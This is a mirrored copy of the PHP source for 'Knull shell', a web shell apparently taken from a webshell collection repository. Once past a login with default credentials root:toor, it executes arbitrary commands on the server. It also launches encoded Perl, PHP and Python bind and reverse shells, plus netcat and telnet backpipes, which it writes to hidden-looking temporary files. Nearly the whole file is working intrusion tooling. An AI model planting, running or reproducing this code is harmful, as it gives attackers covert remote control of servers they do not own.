mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
567 lines
21 KiB
Text
567 lines
21 KiB
Text
<?php
|
|
/*
|
|
|
|
Knull shell alpha1
|
|
|
|
Authored by Knull of http://leethack.info
|
|
|
|
Project homepage: https://code.google.com/p/knull-shell/
|
|
|
|
Features:
|
|
|
|
Contains PHP web frontend
|
|
Contains newer bind/reverse/backpipe shells in PHP/Python/Perl, Telnet/Netcat backpipes
|
|
|
|
Disclaimer: any use of this software on a computing device can only be used with explicit permission
|
|
from the computers rightful owner, I cannot be held responsible for the consequences of your actions.
|
|
|
|
*/
|
|
|
|
error_reporting(0);
|
|
|
|
// check for disabled PHP functions
|
|
|
|
$disabled_funcs=@ini_get('disable_functions');
|
|
if(!empty($disabled_funcs)){ $disabled_funcs=preg_replace('/[, ]+/', ',', $disabled_funcs);
|
|
$disabled_funcs=explode(',', $disabled_funcs);
|
|
$disabled_funcs=array_map('trim', $disabled_funcs); }else{ $disabled_funcs=array(); }
|
|
|
|
function logout() {
|
|
|
|
$_SESSION = array('authenticated' => false);
|
|
|
|
if (isset($_COOKIE[session_name()]))
|
|
setcookie(session_name(), '', time()-44000, '/');
|
|
|
|
session_destroy();
|
|
}
|
|
|
|
|
|
function stripslashes_deep($value) {
|
|
if (is_array($value))
|
|
return array_map('stripslashes_deep', $value);
|
|
else
|
|
return stripslashes($value);
|
|
}
|
|
|
|
// create 'hidden session looking' filename
|
|
function sess_fname() {
|
|
return '.sess_'.md5(mt_rand());
|
|
}
|
|
|
|
// check for valid port
|
|
function is_port($port){
|
|
$retport = (is_numeric($port) && $port>=0 && $port<=65535) ? true : false;
|
|
return $retport;
|
|
}
|
|
|
|
// todo: check for valid ip
|
|
|
|
// execute command by enabled function
|
|
|
|
function exec_method($cmd) {
|
|
|
|
$retval = true;
|
|
|
|
if(is_callable('shell_exec') and !in_array('shell_exec',$disabled_funcs)) {
|
|
$ret_exec=shell_exec($cmd);
|
|
} else if (is_callable('passthru') and !in_array('passthru',$disabled_funcs)) {
|
|
ob_start(); passthru($cmd); $ret_exec=ob_get_contents(); ob_end_clean();
|
|
} else if (is_callable('exec') and !in_array('exec',$disabled_funcs)) {
|
|
$ret_exec=array(); exec($cmd,$ret_exec);
|
|
} else if (is_callable('system') and !in_array('system',$disabled_funcs)) {
|
|
ob_start(); system($cmd); $ret_exec=ob_get_contents(); ob_end_clean();
|
|
} else if (is_callable('proc_open')and!in_array('proc_open',$disabled_funcs)) {
|
|
$handle=proc_open($cmd,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); $ret_exec=NULL; while(!feof($pipes[1])) { $ret_exec.=fread($pipes[1],1024); } @proc_close($handle);
|
|
} else if(is_callable('popen')and!in_array('popen',$disabled_funcs)){
|
|
$fp=popen($cmd,'r'); $ret_exec=NULL;
|
|
} else {
|
|
$retval = false;
|
|
}
|
|
|
|
return $retval;
|
|
|
|
}
|
|
|
|
if (get_magic_quotes_gpc())
|
|
$_POST = stripslashes_deep($_POST);
|
|
|
|
// Initialize variables
|
|
$username = isset($_POST['username']) ? $_POST['username'] : '';
|
|
$password = isset($_POST['password']) ? $_POST['password'] : '';
|
|
|
|
$webshcmd = isset($_POST['cmd']) ? $_POST['cmd'] : '';
|
|
$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
|
|
$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
|
|
|
|
/*
|
|
Default username:password is root:toor , replace '435b41068e8665513a20070c033b08b9c66e4332'
|
|
in the line below with the sha1 hash from the command 'echo -n yourpasswordhere | sha1sum -'
|
|
*/
|
|
$ini['users'] = array('root' => 'sha1:435b41068e8665513a20070c033b08b9c66e4332');
|
|
|
|
// Default settings
|
|
$default_settings = array('home-directory' => '.');
|
|
|
|
// Merge settings
|
|
$ini['settings'] = array_merge($default_settings, $ini['users']);
|
|
|
|
session_start();
|
|
|
|
if (isset($_POST['logout']))
|
|
logout();
|
|
|
|
// Authentication
|
|
if (isset($ini['users'][$username])) {
|
|
if (strchr($ini['users'][$username], ':') === false) {
|
|
// No seperator = clear text password
|
|
$_SESSION['authenticated'] = ($ini['users'][$username] == $password);
|
|
} else {
|
|
list($fkt, $hash) = explode(':', $ini['users'][$username]);
|
|
$_SESSION['authenticated'] = ($fkt($password) == $hash);
|
|
}
|
|
}
|
|
|
|
|
|
// not authed?
|
|
if (!isset($_SESSION['authenticated']))
|
|
$_SESSION['authenticated'] = false;
|
|
|
|
if ($_SESSION['authenticated']) {
|
|
// Initialise session variables
|
|
if (empty($_SESSION['cwd'])) {
|
|
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
|
|
$_SESSION['output'] = '';
|
|
}
|
|
|
|
if (!empty($webshcmd)) {
|
|
|
|
// append commmand to output
|
|
$_SESSION['output'] .= '$ ' . $webshcmd . "\n";
|
|
|
|
// Initialize cwd
|
|
if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $webshcmd)) {
|
|
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
|
|
} elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $webshcmd, $regs)) {
|
|
// 'cd' command to be handled as internal shell command
|
|
|
|
if ($regs[1]{0} == '/') {
|
|
// its an absolute path, leave it
|
|
$new_dir = $regs[1];
|
|
} else {
|
|
// append relative paths to cwd
|
|
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
|
|
}
|
|
|
|
// '/./' becomes '/'
|
|
while (strpos($new_dir, '/./') !== false)
|
|
$new_dir = str_replace('/./', '/', $new_dir);
|
|
|
|
// '//' becomes '/'
|
|
while (strpos($new_dir, '//') !== false)
|
|
$new_dir = str_replace('//', '/', $new_dir);
|
|
|
|
// 'x/..' becomes ''
|
|
while (preg_match('|/\.\.(?!\.)|', $new_dir))
|
|
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
|
|
|
|
if ($new_dir == '') $new_dir = '/';
|
|
|
|
if (@chdir($new_dir)) {
|
|
$_SESSION['cwd'] = $new_dir;
|
|
} else {
|
|
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
|
}
|
|
|
|
} elseif (trim($command) == 'exit') {
|
|
logout();
|
|
} else {
|
|
|
|
chdir($_SESSION['cwd']);
|
|
|
|
// cannot use putenv() when in safe mode
|
|
if (!ini_get('safe_mode')) {
|
|
// putenv the terminal size for programs
|
|
putenv('ROWS=' . $rows);
|
|
putenv('COLUMNS=' . $columns);
|
|
}
|
|
|
|
// alias expansion
|
|
$length = strcspn($webshcmd, " \t");
|
|
$token = substr($webshcmd, 0, $length);
|
|
if (isset($ini['aliases'][$token]))
|
|
$webshcmd = $ini['aliases'][$token] . substr($webshcmd, $length);
|
|
|
|
$io = array();
|
|
$p = proc_open($webshcmd,
|
|
array(1 => array('pipe', 'w'),
|
|
2 => array('pipe', 'w')),
|
|
$io);
|
|
|
|
// stdout
|
|
while (!feof($io[1])) {
|
|
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
|
|
ENT_COMPAT, 'UTF-8');
|
|
}
|
|
// stderr
|
|
while (!feof($io[2])) {
|
|
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
|
|
ENT_COMPAT, 'UTF-8');
|
|
}
|
|
|
|
fclose($io[1]);
|
|
fclose($io[2]);
|
|
proc_close($p);
|
|
}
|
|
|
|
|
|
}
|
|
|
|
echo "<fieldset><legend><h4>Shells</h4></legend><form action='" . $_SERVER['REQUEST_URI'] . "' method='post'>";
|
|
echo "IP: <input type='text' name='ip' size=15 maxlength=65> Port: <input type='text' name='port' size=5 maxlength=5>
|
|
<select name='bd_host'>
|
|
<option value='default'>Select Shell...</option>
|
|
<option value='plbd'>Bind/Perl</option>
|
|
<option value='phpbd'>Bind/PHP</option>
|
|
<option value='ncbp'>Reverse/NetcatBackpipe</option>
|
|
<option value='tnbp'>Reverse/TelnetBackpipe</option>
|
|
<option value='phprev'>Reverse/PHP</option>
|
|
<option value='pyrev'>Reverse/Python</option>
|
|
</select>
|
|
<input type='submit' value='Exec'>";
|
|
// add ip/host validation
|
|
if (empty($_POST['bd_host']) || $_POST['bd_host'] === 'default') { ; }
|
|
else if (!is_port($_POST['port'])) {
|
|
echo '<p class="error">Invalid port number!</p>';
|
|
} else {
|
|
|
|
$uniqfn = '/tmp/' . sess_fname();
|
|
|
|
if ($_POST['bd_host'] === 'plbd'){
|
|
|
|
$bind_pl = "IyEvdXNyL2Jpbi9lbnYgcGVybA0KJFNIRUxMPSIvYmluL2Jhc2ggLWkiOw0KaWYgKEBBUkdWIDwg
|
|
MSkgeyBleGl0KDEpOyB9DQokTElTVEVOX1BPUlQ9JEFSR1ZbMF07DQp1c2UgU29ja2V0Ow0KJHBy
|
|
b3RvY29sPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTLCZQRl9JTkVULCZTT0NLX1NU
|
|
UkVBTSwkcHJvdG9jb2wpIHx8IGRpZSAiZXJyb3I6IHNvY2tldFxuIjsNCnNldHNvY2tvcHQoUyxT
|
|
T0xfU09DS0VULFNPX1JFVVNFQUREUiwxKTsNCmJpbmQoUyxzb2NrYWRkcl9pbigkTElTVEVOX1BP
|
|
UlQsSU5BRERSX0FOWSkpIHx8IGRpZSAiZXJyb3I6IGJpbmRcbiI7DQpsaXN0ZW4oUywzKSB8fCBk
|
|
aWUgImVycm9yOiBsaXN0ZW5cbiI7DQp3aGlsZSgxKQ0Kew0KYWNjZXB0KENPTk4sUyk7DQppZigh
|
|
KCRwaWQ9Zm9yaykpDQp7DQpkaWUgImVycm9yOiBmb3JrIiBpZiAoIWRlZmluZWQgJHBpZCk7DQpv
|
|
cGVuIFNURElOLCI8JkNPTk4iOw0Kb3BlbiBTVERPVVQsIj4mQ09OTiI7DQpvcGVuIFNUREVSUiwi
|
|
PiZDT05OIjsNCmV4ZWMgJFNIRUxMIHx8IGRpZSBwcmludCBDT05OICJlcnJvcjogZXhlYyAkU0hF
|
|
TExcbiI7DQpjbG9zZSBDT05OOw0KZXhpdCAwOw0KfQ0KfQ0K";
|
|
|
|
@$fh=fopen($uniqfn,"ab+");
|
|
@fwrite($fh,base64_decode($bind_pl));
|
|
@fclose($fh);
|
|
$command = 'perl ' . $uniqfn . ' ' . $_POST['port'] . ' > /dev/null &';
|
|
if (exec_method($command)) {
|
|
echo '<p>Perl Bindshell (should be) listening on ' . htmlspecialchars($_POST['ip']) . ':' . htmlspecialchars($_POST['port']) . '</p>';
|
|
} else {
|
|
echo '<p class="error">Unable to execute Perl Bindshell!</p>';
|
|
}
|
|
|
|
} else if (!empty($_POST['bd_host']) && ($_POST['bd_host'] === 'phpbd')){
|
|
|
|
$php_bind = "IyEvdXNyL2Jpbi9waHAKPD9waHAJCi8qIApLbnVsbCdzIG1vZGlmaWVkIGBtc2ZwYXlsb2FkIHBo
|
|
cC9iaW5kX3BocCBSYAoqLwoKaWYgKCRhcmdjID09PSAzKSB7CgpAc2V0X3RpbWVfbGltaXQoMCk7
|
|
CkBpZ25vcmVfdXNlcl9hYm9ydCgxKTsgCkBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDAp
|
|
OwoJCiRkZj1AaW5pX2dldCgnZGlzYWJsZV9mdW5jdGlvbnMnKTsKaWYoIWVtcHR5KCRkZikpewoJ
|
|
JGRmPXByZWdfcmVwbGFjZSgnL1ssIF0rLycsICcsJywgJGRmKTsKCSRkZj1leHBsb2RlKCcsJywg
|
|
JGRmKTsKCSRkZj1hcnJheV9tYXAoJ3RyaW0nLCAkZGYpOwp9ZWxzZXsKCSRkZj1hcnJheSgpOwp9
|
|
CgokcG9ydD0kYXJndlsyXTsKJGlwPSRhcmd2WzFdOwoKJHNvY2s9QHNvY2tldF9jcmVhdGUoQUZf
|
|
SU5FVCxTT0NLX1NUUkVBTSxTT0xfVENQKTsKJHJldD1Ac29ja2V0X2JpbmQoJHNvY2ssJGlwLCRw
|
|
b3J0KTsKJHJldD1Ac29ja2V0X2xpc3Rlbigkc29jayw1KTsKCiRtc2dzb2NrPUBzb2NrZXRfYWNj
|
|
ZXB0KCRzb2NrKTsKQHNvY2tldF9jbG9zZSgkc29jayk7Cgp3aGlsZShGQUxTRSE9PUBzb2NrZXRf
|
|
c2VsZWN0KCRyPWFycmF5KCRtc2dzb2NrKSwgJHc9TlVMTCwgJGU9TlVMTCwgTlVMTCkpCnsKCSRv
|
|
ID0gJyc7CgkkYz1Ac29ja2V0X3JlYWQoJG1zZ3NvY2ssMjA0OCxQSFBfTk9STUFMX1JFQUQpOwoJ
|
|
aWYoRkFMU0U9PT0kYyl7YnJlYWs7fQoJaWYoc3Vic3RyKCRjLDAsMykgPT0gJ2NkICcpewoJCWNo
|
|
ZGlyKHN1YnN0cigkYywzLC0xKSk7Cgl9IGVsc2UgaWYgKHN1YnN0cigkYywwLDQpID09ICdxdWl0
|
|
JyB8fCBzdWJzdHIoJGMsMCw0KSA9PSAnZXhpdCcpIHsKCQlicmVhazsKCX1lbHNlewoJCWlmIChG
|
|
QUxTRSAhPT0gc3RycG9zKHN0cnRvbG93ZXIoUEhQX09TKSwgJ3dpbicgKSkgewoJCSRjPSRjLiIg
|
|
Mj4mMVxuIjsKCX0KCSRpc2M9J2lzX2NhbGxhYmxlJzsKCSRpbmE9J2luX2FycmF5JzsKCQkKCWlm
|
|
KCRpc2MoJ3N5c3RlbScpYW5kISRpbmEoJ3N5c3RlbScsJGRmKSl7CgkJb2Jfc3RhcnQoKTsKCQlz
|
|
eXN0ZW0oJGMpOwoJCSRvPW9iX2dldF9jb250ZW50cygpOwoJCW9iX2VuZF9jbGVhbigpOwoJfWVs
|
|
c2UgaWYoJGlzYygncGFzc3RocnUnKWFuZCEkaW5hKCdwYXNzdGhydScsJGRmKSl7CgkJb2Jfc3Rh
|
|
cnQoKTsKCQlwYXNzdGhydSgkYyk7CgkJJG89b2JfZ2V0X2NvbnRlbnRzKCk7CgkJb2JfZW5kX2Ns
|
|
ZWFuKCk7Cgl9ZWxzZSBpZigkaXNjKCdleGVjJylhbmQhJGluYSgnZXhlYycsJGRmKSl7CgkJJG89
|
|
YXJyYXkoKTsKCQlleGVjKCRjLCRvKTsKCQkkbz1qb2luKGNocigxMCksJG8pLmNocigxMCk7Cgl9
|
|
ZWxzZSBpZigkaXNjKCdwcm9jX29wZW4nKWFuZCEkaW5hKCdwcm9jX29wZW4nLCRkZikpewoJCSRo
|
|
YW5kbGU9cHJvY19vcGVuKCRjLGFycmF5KGFycmF5KHBpcGUsJ3InKSxhcnJheShwaXBlLCd3Jyks
|
|
YXJyYXkocGlwZSwndycpKSwkcGlwZXMpOwoJCSRvPU5VTEw7CgkJd2hpbGUoIWZlb2YoJHBpcGVz
|
|
WzFdKSl7CgkJCSRvLj1mcmVhZCgkcGlwZXNbMV0sMTAyNCk7CgkJfQoJCUBwcm9jX2Nsb3NlKCRo
|
|
YW5kbGUpOwoJfWVsc2UgaWYoJGlzYygncG9wZW4nKWFuZCEkaW5hKCdwb3BlbicsJGRmKSl7CgkJ
|
|
JGZwPXBvcGVuKCRjLCdyJyk7CgkJJG89TlVMTDsKCQlpZihpc19yZXNvdXJjZSgkZnApKXsKCQkJ
|
|
d2hpbGUoIWZlb2YoJGZwKSl7CgkJCQkkby49ZnJlYWQoJGZwLDEwMjQpOwoJCQl9CgkJfQoJCUBw
|
|
Y2xvc2UoJGZwKTsKCX1lbHNlIGlmKCRpc2MoJ3NoZWxsX2V4ZWMnKWFuZCEkaW5hKCdzaGVsbF9l
|
|
eGVjJywkZGYpKXsKCQkkbz1zaGVsbF9leGVjKCRjKTsKCX1lbHNlIHsKCQkkbz0wOwoJfQoJCQoJ
|
|
fQoJQHNvY2tldF93cml0ZSgkbXNnc29jaywkbyxzdHJsZW4oJG8pKTsKfQpAc29ja2V0X2Nsb3Nl
|
|
KCRtc2dzb2NrKTsKfSBlbHNlIHsKCWVjaG8gJ3VzYWdlOiAnIC4gJGFyZ3ZbMF0gLiAnIHBvcnQn
|
|
IC4gIlxuIjsKfQoKPz4K";
|
|
|
|
|
|
@$fh=fopen($uniqfn,"wb+");
|
|
@fwrite($fh,base64_decode($php_bind));
|
|
@fclose($fh);
|
|
$command = 'php ' . $uniqfn . ' ' . $_POST['ip'] . ' ' . $_POST['port'] . ' > /dev/null &';
|
|
if (exec_method($command)) {
|
|
echo '<p>PHP Bindshell (should be) listening on ' . htmlspecialchars($_POST['ip']) . ':' . htmlspecialchars($_POST['port']) . '</p>';
|
|
} else {
|
|
echo '<p class="error">Unable to execute PHP Bindshell</p>';
|
|
}
|
|
|
|
|
|
} else if (!empty($_POST['bd_host']) && ($_POST['bd_host'] === 'phprev')){
|
|
|
|
$php_rev = 'IyEvdXNyL2Jpbi9waHAKPD9waHAKLyogCktudWxsJ3MgbW9kaWZpZWQgYG1zZnBheWxvYWQgcGhw
|
|
L3JldmVyc2VfcGhwIExIT1NUPVguWC5YLlggUmBgCiovCgppZiAoJGFyZ2MgPT09IDMpIHsKCgkk
|
|
aXBhZGRyPSRhcmd2WzFdOwoJJHBvcnQ9JGFyZ3ZbMl07CgkJCglAc2V0X3RpbWVfbGltaXQoMCk7
|
|
IEBpZ25vcmVfdXNlcl9hYm9ydCgxKTsgQGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsMCk7
|
|
CgkkZGY9QGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7CglpZighZW1wdHkoJGRmKSl7CgkJ
|
|
JGRmPXByZWdfcmVwbGFjZSgnL1ssIF0rLycsICcsJywgJGRpcyk7CgkJJGRmPWV4cGxvZGUoJywn
|
|
LCAkZGlzKTsKCQkkZGY9YXJyYXlfbWFwKCd0cmltJywgJGRpcyk7Cgl9ZWxzZXsKCQkkZGY9YXJy
|
|
YXkoKTsKCX0KCQkJCgoJaWYoIWZ1bmN0aW9uX2V4aXN0cygnY2V4ZScpKXsKCQlmdW5jdGlvbiBj
|
|
ZXhlKCRjKXsKCQkJZ2xvYmFsICRkZjsKCQkJCgkJaWYgKEZBTFNFICE9PSBzdHJwb3Moc3RydG9s
|
|
b3dlcihQSFBfT1MpLCAnd2luJyApKSB7CgkJCSRjPSRjLiIgMj4mMVxuIjsKCQl9CgkJJGlzYz0n
|
|
aXNfY2FsbGFibGUnOwoJCSRpc2E9J2luX2FycmF5JzsKCQkKCQlpZigkaXNjKCdzeXN0ZW0nKWFu
|
|
ZCEkaXNhKCdzeXN0ZW0nLCRkZikpewoJCQlvYl9zdGFydCgpOwoJCQlzeXN0ZW0oJGMpOwoJCQkk
|
|
bz1vYl9nZXRfY29udGVudHMoKTsKCQkJb2JfZW5kX2NsZWFuKCk7CgkJfWVsc2UKCQlpZigkaXNj
|
|
KCdwb3BlbicpYW5kISRpc2EoJ3BvcGVuJywkZGYpKXsKCQkJJGZwPXBvcGVuKCRjLCdyJyk7CgkJ
|
|
CSRvPU5VTEw7CgkJCWlmKGlzX3Jlc291cmNlKCRmcCkpewoJCQkJd2hpbGUoIWZlb2YoJGZwKSl7
|
|
CgkJCQkJJG8uPWZyZWFkKCRmcCwxMDI0KTsKCQkJCX0KCQkJfQoJCQlAcGNsb3NlKCRmcCk7CgkJ
|
|
fWVsc2UKCQlpZigkaXNjKCdwcm9jX29wZW4nKWFuZCEkaXNhKCdwcm9jX29wZW4nLCRkZikpewoJ
|
|
CQkkaGFuZGxlPXByb2Nfb3BlbigkYyxhcnJheShhcnJheShwaXBlLCdyJyksYXJyYXkocGlwZSwn
|
|
dycpLGFycmF5KHBpcGUsJ3cnKSksJHBpcGVzKTsKCQkJJG89TlVMTDsKCQkJd2hpbGUoIWZlb2Yo
|
|
JHBpcGVzWzFdKSl7CgkJCQkkby49ZnJlYWQoJHBpcGVzWzFdLDEwMjQpOwoJCQl9CgkJCUBwcm9j
|
|
X2Nsb3NlKCRoYW5kbGUpOwoJCX1lbHNlCgkJaWYoJGlzYygnZXhlYycpYW5kISRpc2EoJ2V4ZWMn
|
|
LCRkZikpewoJCQkkbz1hcnJheSgpOwoJCQlleGVjKCRjLCRvKTsKCQkJJG89am9pbihjaHIoMTAp
|
|
LCRvKS5jaHIoMTApOwoJCX1lbHNlCgkJaWYoJGlzYygncGFzc3RocnUnKWFuZCEkaXNhKCdwYXNz
|
|
dGhydScsJGRmKSl7CgkJCW9iX3N0YXJ0KCk7CgkJCXBhc3N0aHJ1KCRjKTsKCQkJJG89b2JfZ2V0
|
|
X2NvbnRlbnRzKCk7CgkJCW9iX2VuZF9jbGVhbigpOwoJCX1lbHNlCgkJaWYoJGlzYygnc2hlbGxf
|
|
ZXhlYycpYW5kISRpc2EoJ3NoZWxsX2V4ZWMnLCRkZikpewoJCQkkbz1zaGVsbF9leGVjKCRjKTsK
|
|
CQl9ZWxzZQoJCXsKCQkJJG89MDsKCQl9CgkKCQkJcmV0dXJuICRvOwoJCX0KCX0KCSRub2Z1bmNz
|
|
PSdubyBleGVjIGZ1bmN0aW9ucyc7CglpZihpc19jYWxsYWJsZSgnZnNvY2tvcGVuJylhbmQhaW5f
|
|
YXJyYXkoJ2Zzb2Nrb3BlbicsJGRmKSl7CgkJJHM9QGZzb2Nrb3BlbigkaXBhZGRyLCRwb3J0KTsK
|
|
CQl3aGlsZSgkYz1mcmVhZCgkcywyMDQ4KSl7CgkJCSRvdXQgPSAnJzsKCQkJaWYoc3Vic3RyKCRj
|
|
LDAsMykgPT0gJ2NkICcpewoJCQkJY2hkaXIoc3Vic3RyKCRjLDMsLTEpKTsKCQkJfSBlbHNlIGlm
|
|
IChzdWJzdHIoJGMsMCw0KSA9PSAncXVpdCcgfHwgc3Vic3RyKCRjLDAsNCkgPT0gJ2V4aXQnKSB7
|
|
CgkJCQlicmVhazsKCQkJfWVsc2V7CgkJCQkkb3V0PWNleGUoc3Vic3RyKCRjLDAsLTEpKTsKCQkJ
|
|
CWlmKCRvdXQ9PT1mYWxzZSl7CgkJCQkJZndyaXRlKCRzLCRub2Z1bmNzKTsKCQkJCQlicmVhazsK
|
|
CQkJCX0KCQkJfQoJCQlmd3JpdGUoJHMsJG91dCk7CgkJfQoJCWZjbG9zZSgkcyk7Cgl9ZWxzZXsK
|
|
CQkkcz1Ac29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApOwoJCUBzb2Nr
|
|
ZXRfY29ubmVjdCgkcywkaXBhZGRyLCRwb3J0KTsKCQlAc29ja2V0X3dyaXRlKCRzLCJzb2NrZXRf
|
|
Y3JlYXRlIik7CgkJd2hpbGUoJGM9QHNvY2tldF9yZWFkKCRzLDIwNDgpKXsKCQkJJG91dCA9ICcn
|
|
OwoJCQlpZihzdWJzdHIoJGMsMCwzKSA9PSAnY2QgJyl7CgkJCQljaGRpcihzdWJzdHIoJGMsMywt
|
|
MSkpOwoJCQl9IGVsc2UgaWYgKHN1YnN0cigkYywwLDQpID09ICdxdWl0JyB8fCBzdWJzdHIoJGMs
|
|
MCw0KSA9PSAnZXhpdCcpIHsKCQkJCWJyZWFrOwoJCQl9ZWxzZXsKCQkJCSRvdXQ9Y2V4ZShzdWJz
|
|
dHIoJGMsMCwtMSkpOwoJCQkJaWYoJG91dD09PWZhbHNlKXsKCQkJCQlAc29ja2V0X3dyaXRlKCRz
|
|
LCRub2Z1bmNzKTsKCQkJCQlicmVhazsKCQkJCX0KCQkJfQoJCQlAc29ja2V0X3dyaXRlKCRzLCRv
|
|
dXQsc3RybGVuKCRvdXQpKTsKCQl9CgkJQHNvY2tldF9jbG9zZSgkcyk7Cgl9Cn0gZWxzZSB7CiAg
|
|
ICAgICAgZWNobyAndXNhZ2U6ICcgLiAkYXJndlswXSAuICcgcG9ydCcgLiAiXG4iOwp9Cgo/Pgo=
|
|
';
|
|
|
|
@$fh=fopen($uniqfn,"wb+");
|
|
@fwrite($fh,base64_decode($php_rev));
|
|
@fclose($fh);
|
|
$command = 'php ' . $uniqfn . ' ' . $_POST['ip'] . ' ' . $_POST['port'] . ' > /dev/null &';
|
|
if (exec_method($command)) {
|
|
echo '<p>Check your nc listener on ' . htmlspecialchars($_POST['ip']) . ':' . htmlspecialchars($_POST['port']) . '</p>';
|
|
} else {
|
|
echo '<p class="error">Unable to execute PHP reverse shell</p>';
|
|
}
|
|
|
|
} else if (!empty($_POST['bd_host']) && ($_POST['bd_host'] === 'pyrev')){
|
|
|
|
$py_rev = 'aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHN5cwoKcz1zb2NrZXQuc29ja2V0KHNvY2tldC5B
|
|
Rl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKcy5jb25uZWN0KChzeXMuYXJndlsxXSxpbnQoc3lz
|
|
LmFyZ3ZbMl0pKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpv
|
|
cy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7
|
|
Cg==';
|
|
|
|
@$fh=fopen($uniqfn,"wb+");
|
|
@fwrite($fh,base64_decode($py_rev));
|
|
@fclose($fh);
|
|
$command = 'python ' . $uniqfn . ' ' . $_POST['ip'] . ' ' . $_POST['port'] . ' > /dev/null &';
|
|
if (exec_method($command)) {
|
|
echo '<p>Check your nc listener on ' . htmlspecialchars($_POST['ip']) . ':' . htmlspecialchars($_POST['port']) . '</p>';
|
|
} else {
|
|
echo '<p class="error">Unable to execute Python reverse shell</p>';
|
|
}
|
|
|
|
} else if (!empty($_POST['bd_host']) && ($_POST['bd_host'] === 'ncbp')){
|
|
|
|
$bpname = '/tmp/' . sess_fname();
|
|
$cmdfile = 'mknod ' . $bpname . ' p && nc ' . $_POST['ip'] . ' ' . $_POST['port'] . ' 0<' . $bpname . ' | /bin/bash 1>' . $bpname . ' &';
|
|
@$fh=fopen($uniqfn,"wb+");
|
|
@fwrite($fh,$cmdfile);
|
|
@fclose($fh);
|
|
$command = '/bin/bash ' . $uniqfn . ' > /dev/null &';
|
|
if (exec_method($command)) {
|
|
echo '<p>Check your Netcat listener on ' . htmlspecialchars($_POST['ip']) . ':' . htmlspecialchars($_POST['port']) . '</p>';
|
|
} else {
|
|
echo '<p class="error">Unable to execute Netcat Backpipe</p>';
|
|
}
|
|
|
|
|
|
} else if (isset($_POST['bd_host']) && ($_POST['bd_host'] === 'tnbp')){
|
|
|
|
$bpname = '/tmp/' . sess_fname();
|
|
$cmdfile = 'mknod ' . $bpname . ' p && telnet ' . $_POST['ip'] . ' ' . $_POST['port'] . ' 0<' . $bpname . ' | /bin/bash 1>' . $bpname;
|
|
@$fh=fopen($uniqfn,"wb+");
|
|
@fwrite($fh,$cmdfile);
|
|
@fclose($fh);
|
|
$command = '/bin/bash ' . $uniqfn . ' > /dev/null &';
|
|
if (exec_method($command)) {
|
|
echo '<p>Check your Netcat listener on ' . htmlspecialchars($_POST['ip']) . ':' . htmlspecialchars($_POST['port']) . '</p>';
|
|
} else {
|
|
echo '<p class="error">Unable to execute Telnet Backpipe</p>';
|
|
}
|
|
|
|
|
|
}
|
|
}
|
|
echo '</fieldset>';
|
|
|
|
|
|
}
|
|
|
|
?>
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
|
"http://www.w3.org/TR/html4/strict.dtd">
|
|
<html>
|
|
<head>
|
|
<title>Knull Shell</title>
|
|
<style type="text/css">
|
|
|
|
body {
|
|
font-family: sans-serif;
|
|
color: black;
|
|
background: #f3f3f3;
|
|
}
|
|
|
|
h4 {
|
|
color: navy;
|
|
}
|
|
|
|
img {
|
|
border: none;
|
|
}
|
|
|
|
div#terminal {
|
|
border: inset 2px navy;
|
|
padding: 2px;
|
|
margin-top: 0.5em;
|
|
}
|
|
|
|
div#terminal textarea {
|
|
color: white;
|
|
background: black;
|
|
font-size: 100%;
|
|
width: 100%;
|
|
border: none;
|
|
}
|
|
|
|
p {
|
|
margin-top: 0.5em;
|
|
margin-bottom: 0.5em;
|
|
}
|
|
|
|
p#prompt {
|
|
color: white;
|
|
background: black;
|
|
font-family: monospace;
|
|
margin: 0px;
|
|
}
|
|
|
|
p#prompt input {
|
|
color: white;
|
|
background: black;
|
|
border: none;
|
|
font-family: monospace;
|
|
}
|
|
|
|
legend {
|
|
padding-right: 0.5em;
|
|
}
|
|
|
|
fieldset {
|
|
padding: 0.5em;
|
|
}
|
|
|
|
div#navycolor {
|
|
|
|
color: navy;
|
|
|
|
}
|
|
|
|
.error {
|
|
color: red;
|
|
}
|
|
|
|
</style>
|
|
</head>
|
|
|
|
<body>
|
|
|
|
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
|
|
|
|
<?php
|
|
if (!$_SESSION['authenticated']) {
|
|
?>
|
|
|
|
<fieldset>
|
|
<legend><h4>Authentication</h4></legend>
|
|
|
|
<?php
|
|
if (!empty($username))
|
|
echo ' <p class="error">Login failed, please try again:</p>' . "\n";
|
|
?>
|
|
|
|
<p>Username: <input name="username" type="text" value="<?php echo $username
|
|
?>"></p>
|
|
|
|
<p>Password: <input name="password" type="password"></p>
|
|
|
|
<p><input type="submit" value="Login"></p>
|
|
|
|
</fieldset>
|
|
|
|
<?php } else { /* Auth'd */ ?>
|
|
|
|
<fieldset>
|
|
<legend><h4>Server Details</h4></legend>
|
|
